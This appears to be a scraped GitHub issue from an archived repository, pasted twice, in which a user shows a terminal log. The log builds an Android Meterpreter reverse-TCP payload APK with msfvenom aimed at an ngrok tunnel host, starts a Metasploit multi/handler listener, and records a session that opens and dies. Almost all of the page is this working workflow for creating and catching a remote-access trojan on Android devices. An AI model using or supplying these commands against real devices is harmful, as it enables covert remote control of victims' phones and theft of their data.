You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
{{ message }}
This repository has been archived by the owner on Jan 22, 2024. It is now read-only.
$ msfvenom -p android/meterpreter/reverse_tcp lhost=0.tcp.ngrok.io lport=17629 R > /sdcard/666.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10189 bytes
$ msfconsole
Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready...
access security
access: PERMISSION DENIED.
access security grid
access: PERMISSION DENIED.
access main security grid
access: PERMISSION DENIED....and...
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
Metasploit tip: Metasploit can be configured at startup, see msfconsole --help to learn more
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost localhost
lhost => localhost
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > exploit
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[] Started reverse TCP handler on 127.0.0.1:4444
[] Sending stage (73742 bytes) to 127.0.0.1
[] 127.0.0.1 - Meterpreter session 1 closed. Reason: Died
[] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:42757) at 2020-07-04 11:32:04 +0530
The text was updated successfully, but these errors were encountered:
$ msfvenom -p android/meterpreter/reverse_tcp lhost=0.tcp.ngrok.io lport=17629 R > /sdcard/666.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10189 bytes
$ msfconsole
Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready...
Metasploit tip: Metasploit can be configured at startup, see msfconsole --help to learn more
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost localhost
lhost => localhost
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > exploit
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[] Started reverse TCP handler on 127.0.0.1:4444
[] Sending stage (73742 bytes) to 127.0.0.1
[] 127.0.0.1 - Meterpreter session 1 closed. Reason: Died
[] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:42757) at 2020-07-04 11:32:04 +0530
The text was updated successfully, but these errors were encountered: